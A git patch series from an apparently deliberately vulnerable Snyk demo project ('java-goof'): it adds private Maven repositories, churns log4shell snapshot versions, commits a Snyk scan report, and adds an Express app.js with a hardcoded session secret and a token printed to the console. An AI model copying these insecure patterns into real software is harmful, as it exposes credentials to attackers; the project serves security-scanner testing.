"6bb333cc-0ffb-4f07-924f-c128d54c1c12", - "ignoreSettings": { - "adminOnly": false, - "reasonRequired": true, - "disregardFilesystemIgnores": false - }, - "summary": "No known vulnerabilities", - "filesystemPolicy": true, - "uniqueCount": 0, - "projectName": "io.github.snyk:java-goof", - "foundProjectCount": 7, - "displayTargetFile": "pom.xml", - "hasUnknownVersions": false, - "path": "/Users/austindoll/Documents/GitHub/java-goof" -} From 501328b2ef5451b7c2b9fefa3f45a35d02ae3b0f Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Thu, 27 Mar 2025 12:05:48 -0400 Subject: [PATCH 23/38] add private deps private deps as an example --- .gitignore | 1 + log4shell-goof/log4shell-client/pom.xml | 17 + log4shell-goof/log4shell-server/pom.xml | 11 + snyk.html | 493 ++++++++++++++++++++++++ 4 files changed, 522 insertions(+) create mode 100644 snyk.html diff --git a/.gitignore b/.gitignore index 6498370b82..cef2b9315d 100644 --- a/.gitignore +++ b/.gitignore @@ -2,3 +2,4 @@ .idea **/target/** **/.DS_Store +settings.xml \ No newline at end of file diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 3d3e211cca..8fdead3edc 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -7,6 +7,14 @@ 0.0.1-SNAPSHOT + + snapshots + https://adolltesting.com/repository/maven-snapshots/ + + true + always + + log4shell-client 0.0.1-SNAPSHOT @@ -19,7 +27,16 @@ 8 + + + + + + io.snyk + log4shell-server + 0.0.1-SNAPSHOT + org.apache.logging.log4j log4j-core diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml index 593d2298d7..a76bf7968f 100644 --- a/log4shell-goof/log4shell-server/pom.xml +++ b/log4shell-goof/log4shell-server/pom.xml @@ -16,6 +16,17 @@ 8 + + + releases Releases repo + https://adolltesting.com/repository/maven-releases/ + + + snapshots Snapshots + https://adolltesting.com/repository/maven-snapshots/ + + + org.apache.logging.log4j diff --git a/snyk.html b/snyk.html new file mode 100644 index 0000000000..2e3b68c5db --- /dev/null +++ b/snyk.html @@ -0,0 +1,493 @@ + + + + + + + + + Snyk test report + + + + + + + + + +
+
+
+
+ + + Snyk - Open Source Security + + + + + + + +
+

Snyk test report

+ +

March 12th 2025, 8:38:23 pm (UTC+00:00)

+
+
+ Scanned the following path: +
    +
  • /Users/austindoll/Documents/GitHub/java-goof/pom.xml (maven)
    • +
+
+ +
+
0 known vulnerabilities
+
0 vulnerable dependency paths
+
0 dependencies
+
+
+
+
+
+ + + + + + + +
Project io.github.snyk:java-goof
Path /Users/austindoll/Documents/GitHub/java-goof
Package Manager maven
Manifest pom.xml
+
+
+ No known vulnerabilities detected. +
+
+ + + + From 60401092e270a974124ecb1b9725f7fc40d41d32 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Thu, 27 Mar 2025 12:09:36 -0400 Subject: [PATCH 24/38] fix --- log4shell-goof/log4shell-client/pom.xml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 8fdead3edc..2d37d2974d 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -7,13 +7,16 @@ 0.0.1-SNAPSHOT + - snapshots + releases Releases repo + https://adolltesting.com/repository/maven-releases/ + + + snapshots Snapshots https://adolltesting.com/repository/maven-snapshots/ - - true - always - + + log4shell-client 0.0.1-SNAPSHOT @@ -28,9 +31,6 @@ - - - io.snyk From 74376a9ac981e259bffd618e75f687645cee35eb Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Thu, 27 Mar 2025 12:55:22 -0400 Subject: [PATCH 25/38] Update pom.xml --- log4shell-goof/log4shell-client/pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 2d37d2974d..fe276cf0fa 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.1-SNAPSHOT + 0.0.2-SNAPSHOT org.apache.logging.log4j From 313010ede42b9d91bad524a0218869801e2b019f Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 10:17:46 -0400 Subject: [PATCH 26/38] commit --- log4shell-goof/log4shell-client/pom.xml | 2 +- log4shell-goof/log4shell-server/pom.xml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index fe276cf0fa..2d37d2974d 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.2-SNAPSHOT + 0.0.1-SNAPSHOT org.apache.logging.log4j diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml index a76bf7968f..66847daffb 100644 --- a/log4shell-goof/log4shell-server/pom.xml +++ b/log4shell-goof/log4shell-server/pom.xml @@ -4,7 +4,7 @@ io.snyk log4shell-server - 0.0.1-SNAPSHOT + 0.0.2-SNAPSHOT jar Java Goof :: Log4Shell Goof :: Log4Shell Server From 3942b3dab6a09310d65aed1f4b69a9b7c46e950a Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 10:23:21 -0400 Subject: [PATCH 27/38] commit --- log4shell-goof/log4shell-client/pom.xml | 2 +- log4shell-goof/log4shell-server/pom.xml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 2d37d2974d..e0e340361f 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.1-SNAPSHOT + 0.0.3-SNAPSHOT org.apache.logging.log4j diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml index 66847daffb..da64545028 100644 --- a/log4shell-goof/log4shell-server/pom.xml +++ b/log4shell-goof/log4shell-server/pom.xml @@ -4,7 +4,7 @@ io.snyk log4shell-server - 0.0.2-SNAPSHOT + 0.0.3-SNAPSHOT jar Java Goof :: Log4Shell Goof :: Log4Shell Server From 070ce04692501361c799f3372ed2934cbbacaaa6 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 10:24:44 -0400 Subject: [PATCH 28/38] test --- log4shell-goof/log4shell-client/pom.xml | 2 +- log4shell-goof/log4shell-server/pom.xml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index e0e340361f..9f87d249c1 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.3-SNAPSHOT + 0.0.5-SNAPSHOT org.apache.logging.log4j diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml index da64545028..f23cf70750 100644 --- a/log4shell-goof/log4shell-server/pom.xml +++ b/log4shell-goof/log4shell-server/pom.xml @@ -4,7 +4,7 @@ io.snyk log4shell-server - 0.0.3-SNAPSHOT + 0.0.5-SNAPSHOT jar Java Goof :: Log4Shell Goof :: Log4Shell Server From 7ef686302897315ecab3927ed2e38490b83962b0 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 10:26:24 -0400 Subject: [PATCH 29/38] a --- log4shell-goof/log4shell-client/pom.xml | 2 +- log4shell-goof/log4shell-server/pom.xml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 9f87d249c1..7e88e97c15 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.5-SNAPSHOT + 0.0.6-SNAPSHOT org.apache.logging.log4j diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml index f23cf70750..c31e49261f 100644 --- a/log4shell-goof/log4shell-server/pom.xml +++ b/log4shell-goof/log4shell-server/pom.xml @@ -4,7 +4,7 @@ io.snyk log4shell-server - 0.0.5-SNAPSHOT + 0.0.6-SNAPSHOT jar Java Goof :: Log4Shell Goof :: Log4Shell Server From bb6bfc80c2f95100f7488faf6634f22b7fdb43d0 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 10:28:18 -0400 Subject: [PATCH 30/38] test --- log4shell-goof/log4shell-client/pom.xml | 2 +- log4shell-goof/log4shell-server/pom.xml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 7e88e97c15..49de440d02 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.6-SNAPSHOT + 0.0.7-SNAPSHOT org.apache.logging.log4j diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml index c31e49261f..b155b9a91a 100644 --- a/log4shell-goof/log4shell-server/pom.xml +++ b/log4shell-goof/log4shell-server/pom.xml @@ -4,7 +4,7 @@ io.snyk log4shell-server - 0.0.6-SNAPSHOT + 0.0.7-SNAPSHOT jar Java Goof :: Log4Shell Goof :: Log4Shell Server From dc672f2d894fa2c2d5e4a4e0504197d213274956 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 11:28:01 -0400 Subject: [PATCH 31/38] Update pom.xml --- log4shell-goof/log4shell-client/pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 49de440d02..fe276cf0fa 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.7-SNAPSHOT + 0.0.2-SNAPSHOT org.apache.logging.log4j From 8e8d9225077f66b99029bac177b599a75c0c6c9b Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 11:30:41 -0400 Subject: [PATCH 32/38] Update pom.xml --- log4shell-goof/log4shell-client/pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index fe276cf0fa..2d37d2974d 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.2-SNAPSHOT + 0.0.1-SNAPSHOT org.apache.logging.log4j From e6424fc715d4755564c4cff689690b38c53f4b18 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 11:34:45 -0400 Subject: [PATCH 33/38] Update pom.xml --- log4shell-goof/log4shell-client/pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 2d37d2974d..b85663cbf2 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.1-SNAPSHOT + 0.0.4-SNAPSHOT org.apache.logging.log4j From 2ad70b4f03bcf1371f605e3ff000446fa4a9fcc9 Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 11:36:44 -0400 Subject: [PATCH 34/38] Update pom.xml --- log4shell-goof/log4shell-client/pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index b85663cbf2..9f87d249c1 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.4-SNAPSHOT + 0.0.5-SNAPSHOT org.apache.logging.log4j From 5fccc0ab70a2ca0303fa9613f16c047dac597d6a Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 11:39:48 -0400 Subject: [PATCH 35/38] Update pom.xml --- log4shell-goof/log4shell-client/pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 9f87d249c1..7e88e97c15 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.5-SNAPSHOT + 0.0.6-SNAPSHOT org.apache.logging.log4j From 78ed2f28214af789b12a816ebbbfc448861f03bc Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 11:41:54 -0400 Subject: [PATCH 36/38] Update pom.xml --- log4shell-goof/log4shell-client/pom.xml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 7e88e97c15..49de440d02 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.6-SNAPSHOT + 0.0.7-SNAPSHOT org.apache.logging.log4j From 51a738aca01bae7488547a618ca4fead56b3df0f Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Fri, 28 Mar 2025 11:44:16 -0400 Subject: [PATCH 37/38] tre --- log4shell-goof/log4shell-client/pom.xml | 2 +- log4shell-goof/log4shell-server/pom.xml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/log4shell-goof/log4shell-client/pom.xml b/log4shell-goof/log4shell-client/pom.xml index 49de440d02..42d2b160f1 100644 --- a/log4shell-goof/log4shell-client/pom.xml +++ b/log4shell-goof/log4shell-client/pom.xml @@ -35,7 +35,7 @@ io.snyk log4shell-server - 0.0.7-SNAPSHOT + 0.0.9-SNAPSHOT org.apache.logging.log4j diff --git a/log4shell-goof/log4shell-server/pom.xml b/log4shell-goof/log4shell-server/pom.xml index b155b9a91a..79074c7890 100644 --- a/log4shell-goof/log4shell-server/pom.xml +++ b/log4shell-goof/log4shell-server/pom.xml @@ -4,7 +4,7 @@ io.snyk log4shell-server - 0.0.7-SNAPSHOT + 0.0.9-SNAPSHOT jar Java Goof :: Log4Shell Goof :: Log4Shell Server From c815e571cedcc6b6b7bd660e5497d6fdb3fe2a1f Mon Sep 17 00:00:00 2001 From: dollav <146855949+dollav@users.noreply.github.com> Date: Tue, 5 Aug 2025 12:31:05 -0400 Subject: [PATCH 38/38] Create app.js --- app.js | 88 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 88 insertions(+) create mode 100644 app.js diff --git a/app.js b/app.js new file mode 100644 index 0000000000..e7dfa39ffd --- /dev/null +++ b/app.js @@ -0,0 +1,88 @@ +/** + * Module dependencies. + */ + +// mongoose setup +require('./mongoose-db'); +require('./typeorm-db') + +var st = require('st'); +var crypto = require('crypto'); +var express = require('express'); +var http = require('http'); +var path = require('path'); +var ejsEngine = require('ejs-locals'); +var bodyParser = require('body-parser'); +var session = require('express-session') +var methodOverride = require('method-override'); +var logger = require('morgan'); +var errorHandler = require('errorhandler'); +var optional = require('optional'); +var marked = require('marked'); +var fileUpload = require('express-fileupload'); +var dust = require('dustjs-linkedin'); +var dustHelpers = require('dustjs-helpers'); +var cons = require('consolidate'); +const hbs = require('hbs') + +var app = express(); +var routes = require('./routes'); +var routesUsers = require('./routes/users.js') + +// all environments +app.set('port', process.env.PORT || 3001); +app.engine('ejs', ejsEngine); +app.engine('dust', cons.dust); +app.engine('hbs', hbs.__express); +cons.dust.helpers = dustHelpers; +app.set('views', path.join(__dirname, 'views')); +app.set('view engine', 'ejs'); +app.use(logger('dev')); +app.use(methodOverride()); +app.use(session({ + secret: 'keyboard cat', + name: 'connect.sid', + cookie: { path: '/' } +})) +app.use(bodyParser.json()); +app.use(bodyParser.urlencoded({ extended: false })); +app.use(fileUpload()); + +// Routes +app.use(routes.current_user); +app.get('/', routes.index); +app.get('/login', routes.login); +app.post('/login', routes.loginHandler); +app.get('/admin', routes.isLoggedIn, routes.admin); +app.get('/account_details', routes.isLoggedIn, routes.get_account_details); +app.post('/account_details', routes.isLoggedIn, routes.save_account_details); +app.get('/logout', routes.logout); +app.post('/create', routes.create); +app.get('/destroy/:id', routes.destroy); +app.get('/edit/:id', routes.edit); +app.post('/update/:id', routes.update); +app.post('/import', routes.import); +app.get('/about_new', routes.about_new); +app.get('/chat', routes.chat.get); +app.put('/chat', routes.chat.add); +app.delete('/chat', routes.chat.delete); +app.use('/users', routesUsers) + +// Static +app.use(st({ path: './public', url: '/public' })); + +// Add the option to output (sanitized!) markdown +marked.setOptions({ sanitize: true }); +app.locals.marked = marked; + +// development only +if (app.get('env') == 'development') { + app.use(errorHandler()); +} + +var token = 'SECRET_TOKEN_f8ed84e8f41e4146403dd4a6bbcea5e418d23a9'; +console.log('token: ' + token); + +http.createServer(app).listen(app.get('port'), function () { + console.log('Express server listening on port ' + app.get('port')); +});